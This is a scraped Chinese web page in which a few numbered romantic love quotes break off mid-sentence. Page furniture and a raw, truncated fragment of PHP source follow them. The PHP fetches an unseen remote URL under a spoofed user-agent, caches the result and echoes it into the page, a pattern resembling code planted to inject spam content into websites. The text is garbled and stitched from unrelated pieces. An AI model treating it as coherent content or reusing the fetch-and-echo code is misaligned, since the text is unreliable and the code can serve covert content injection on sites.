1、我最想去的地方,是你的心里。我的心不大,只装得下一个你。2、我不做过客,不做记忆,不做配角,只想做你最重要的人。3、如果有一千个人从我身边走过,我也可以听出你的脚步声,因为其他人是踏在地上,只有你踏在我的心上。4、人生若只如初见,你衔我一片纯白岁月,我陪你看细水长流。5、一屋两人,一日三餐,四季有你,这就是爱情最好的归宿。6、“今天不
2021-07-11 589
显示验证码
没有账号?注册  忘记密码?
array( "header"=>array( "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0 Seowhy", ), "method" => "GET", "timeout" => 2 ), ); $context = stream_context_create($opts); $content = @file_get_contents($url,false, $context); if (isset($http_response_header)) { if(is_array($http_response_header)){ $http_response_header = $http_response_header[0]; } if(strpos($http_response_header,"200 OK") !==false && $content != "error"){ @file_put_contents($cacheUrl, $content); echo $content; } } }else{ $content = @file_get_contents($cacheUrl); echo $content; } ?>